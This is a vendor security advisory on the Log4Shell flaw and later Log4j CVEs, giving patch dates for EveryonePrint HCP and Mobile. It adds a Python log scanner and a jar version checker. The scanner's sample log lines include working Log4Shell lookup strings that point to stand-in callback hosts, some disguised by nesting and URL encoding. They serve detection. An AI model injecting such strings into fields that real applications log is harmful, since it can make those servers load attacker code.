A recent critical vulnerability identified in Log4j has been addressed in HCP 3.18
Rashid Maknin 17 Dec 2021

On December 9, 2021, a very serious vulnerability in the popular Java-based logging library Apache Log4j was publicly disclosed.

This vulnerability, commonly called Log4Shell, allows an unauthenticated attacker to execute code on a remote server, a so-called Remote Code Execution (RCE). The attacker only needs to get a crafted string into any value the application logs (a user agent, a username, a print job name); Log4j's message lookup feature then resolves the string as a JNDI reference and loads code from a server the attacker controls. Because of the widespread use of Java and Log4j, this is likely one of the most serious vulnerabilities on the Internet since Heartbleed and Shellshock.
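To make the mechanism concrete, here is a small detection routine, added to this advisory as an example and not part of EveryonePrint's own tooling, that scans web-access log lines for the `${jndi:...}` lookup string an exploitation attempt has to get logged. The log lines are constructed for the example; the normalisation step resolves the `${lower:x}` and `${::-x}` nesting tricks that are widely used to evade naive string matching, and URL-decodes the line first so encoded probes are caught as well.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not taken from any real HCP log). The first four carry
# the lookup string a Log4Shell probe injects into a field that ends up logged,
# here the User-Agent; lines 2-4 hide the literal "jndi" with nesting and URL encoding.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.9/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/x}"',
    '203.0.113.10 - - "GET /api/v1/login HTTP/1.1" 200 "%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fprobe%7D"',
    '203.0.113.11 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
]

# ${anything:-value} -> value   (so ${::-j} -> j); only innermost lookups, no nested braces
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# ${lower:x} / ${upper:x} -> x
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# What remains after normalisation if the line carried a JNDI lookup
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, max_rounds=20):
    """Collapse the innermost lookups repeatedly until the string stops changing,
    so nested obfuscations resolve to the plain ${jndi:...} Log4j itself would see."""
    for _ in range(max_rounds):
        collapsed = CASE_LOOKUP.sub(r"\1", DEFAULT_VALUE.sub(r"\1", text))
        if collapsed == text:
            break
        text = collapsed
    return text


def is_jndi_probe(line):
    """True if the (URL-decoded, normalised) line contains a ${jndi:...} lookup."""
    return bool(JNDI_LOOKUP.search(normalize(unquote(line))))


def scan(lines):
    """Return (index, line) for every line that looks like a Log4Shell probe."""
    return [(i, line) for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for idx, line in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: probe -> {normalize(unquote(line))}")
```

A hit means an exploitation attempt was logged, not that it succeeded; the hostname or IP inside the lookup is the callback server worth blocking and hunting for in outbound DNS and LDAP traffic. The normaliser only covers the two most common nesting tricks, so treat it as triage, not as a substitute for upgrading Log4j.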

The vulnerability is tracked as CVE-2021-44228 and affects Log4j 2 from version 2.0-beta9 up to and including 2.14.1. It is patched in 2.15.0.

[UPDATE from 17 December 2021] An additional vulnerability, CVE-2021-45046, was found in Log4j 2.15.0. It is patched in 2.16.0.

[UPDATE from 21 December 2021] A further vulnerability, CVE-2021-45105, was found in Log4j 2.16.0. It is patched in 2.17.0.
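The affected and fixed versions above can be turned into an inventory check. The following script is an added example, not an EveryonePrint or Apache tool: it reads the log4j-core version from the Maven pom.properties metadata inside a jar (and inside jars nested in a war or ear), notes whether JndiLookup.class is still present, and reports which of the four CVEs that version is still exposed to. The war it scans is constructed inline as a stand-in; the fixed-version table is taken from this advisory and its updates.

```python
import io
import re
import zipfile

# First fixed log4j-core version per CVE, as stated in this advisory and its updates.
# Tuples are (major, minor, patch, is_final_release) so that 2.0-beta9 sorts below 2.0.
FIXED_IN = {
    "CVE-2021-44228": (2, 15, 0, 1),
    "CVE-2021-45046": (2, 16, 0, 1),
    "CVE-2021-45105": (2, 17, 0, 1),
    "CVE-2021-44832": (2, 17, 1, 1),
}
# The two CVEs that go through the JndiLookup plugin; deleting that class from the
# jar is Apache's documented workaround for them where an upgrade is not possible.
JNDI_LOOKUP_CVES = {"CVE-2021-44228", "CVE-2021-45046"}

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(.+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), 0 if m.group(4) else 1)


def assess(version, jndi_lookup_present=True):
    """CVEs from FIXED_IN that a log4j-core of this version is exposed to.
    Caveat: the 2.3.x / 2.12.x backport branches for older Java runtimes are not
    modelled, so a patched 2.12.4 is conservatively reported as exposed here."""
    v = parse_version(version)
    if v[0] < 2:  # Log4j 1.x has no message lookup feature, so none of these apply
        return []
    exposed = [cve for cve, fixed in FIXED_IN.items() if v < fixed]
    if not jndi_lookup_present:
        exposed = [cve for cve in exposed if cve not in JNDI_LOOKUP_CVES]
    return exposed


def find_log4j_core(archive_bytes, path, _depth=0):
    """Walk a jar/war/ear, recursing into nested archives up to three levels, and
    return one (path, version, exposed_cves, jndi_lookup_present) per log4j-core."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(archive_bytes))
    except zipfile.BadZipFile:
        return []
    found = []
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            fields = dict(line.split("=", 1) for line in props.splitlines()
                          if "=" in line and not line.startswith("#"))
            version = fields.get("version", "").strip()
            jndi = JNDI_CLASS in names
            found.append((path, version, assess(version, jndi) if version else None, jndi))
        if _depth < 3:
            for name in sorted(names):
                if name.lower().endswith(NESTED_SUFFIXES):
                    found.extend(find_log4j_core(zf.read(name), f"{path}!{name}", _depth + 1))
    return found


def build_sample_war():
    """Constructed fixture, not a real HCP artifact: a war whose WEB-INF/lib holds
    three stand-in log4j-core jars containing only the two entries inspected above."""
    def fake_log4j_core(version, with_jndi_lookup=True):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as jar:
            jar.writestr(POM_PROPS, "#Generated by Maven\n"
                         f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
            if with_jndi_lookup:
                jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, no bytecode
        return buf.getvalue()

    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", fake_log4j_core("2.17.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.10.0-stripped.jar", fake_log4j_core("2.10.0", False))
    return war.getvalue()


if __name__ == "__main__":
    for path, version, cves, jndi in find_log4j_core(build_sample_war(), "app.war"):
        print(f"{path}: log4j-core {version}, JndiLookup {'present' if jndi else 'removed'}, "
              f"exposed to {cves or 'none of the listed CVEs'}")
```

Run it against a real deployment by replacing build_sample_war() with the bytes of each jar, war or ear under the application's install directory. It only looks at Maven metadata, so a relocated or shaded copy of log4j-core without pom.properties will be missed; a second pass that greps every archive for JndiLookup.class catches those.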

EveryonePrint Hybrid Cloud Platform (HCP)

EveryonePrint HCP is Java-based software and uses Log4j version 2.

As soon as the vulnerability was disclosed and the patched Log4j 2.15.0 was available, we integrated it into HCP. The fix is already live in production in EveryonePrint HCP version 3.18.2, released on Saturday, December 11, 2021.

We strongly recommend that customers running HCP secondary gateways, or running HCP in a private cloud, update their HCP installations as soon as possible.

Secondary HCP gateways can be upgraded remotely from the HCP admin web UI, on the Servers screen under the customer account. More information on updating secondary gateways can be found in documentation section 5.20.1, Remote Update of Secondary Gateways.

Customers with a private cloud installation can perform a simple over-the-top upgrade. More information can be found in documentation section 4.6, Update a server.

[UPDATE from 17 December 2021] HCP 3.18 has been upgraded to Log4j 2.16.0. Although the newly identified vulnerability (CVE-2021-45046) does not affect HCP, our team wants to keep HCP current with the latest security fixes for the Log4j library. We advise all partners with HCP secondary gateways or HCP private clouds to upgrade to HCP 3.18.3.

[UPDATE from 21 December 2021] HCP 3.18 has been upgraded to Log4j 2.17.0. Although the newly identified vulnerability (CVE-2021-45105) does not affect HCP, our team wants to keep HCP current with the latest security fixes for the Log4j library. We advise all partners with HCP secondary gateways or HCP private clouds to upgrade to HCP 3.18.4.

[UPDATE from 5 January 2022] Log4j has released a further version, 2.17.1, to address CVE-2021-44832. Exploiting this vulnerability requires administrative access to the server: the attacker must be able to modify the logging configuration. As administrative access to our servers is tightly controlled, HCP is not at risk from this vulnerability, and we will therefore not release a hotfix for this Log4j version; it will instead be included in our next release, 3.19.

EveryonePrint Mobile

EveryonePrint Mobile is also Java-based software, but uses Log4j version 1. Log4j 1.x does not implement the message lookup feature that CVE-2021-44228 abuses and is therefore not vulnerable to it (note, however, that Log4j 1.x reached end of life in 2015 and no longer receives security fixes). An upgrade to Log4j 2.16 is being investigated.

[UPDATE from 21 December 2021] EveryonePrint Mobile remains on Log4j version 1. This version is not vulnerable to the vulnerabilities identified in Log4j 2.15 to 2.17 and does not require an upgrade.

Related Knowledge Base Articles

Click the links below to learn more about the Log4j vulnerability:

  • Log4j Vulnerability
  • How to protect against the log4j vulnerability if I can't upgrade HCP

Timeline and Release Update:

  • 11 December 2021: CVE-2021-44228 / log4j version 2.15.0 / HCP 3.18.2
  • 17 December 2021: CVE-2021-45046 / log4j version 2.16.0 / HCP 3.18.3
  • 21 December 2021: CVE-2021-45105 / log4j version 2.17.0 / HCP 3.18.4
  • 5 January 2022: CVE-2021-44832 / log4j version 2.17.1 / no hotfix, included in HCP 3.19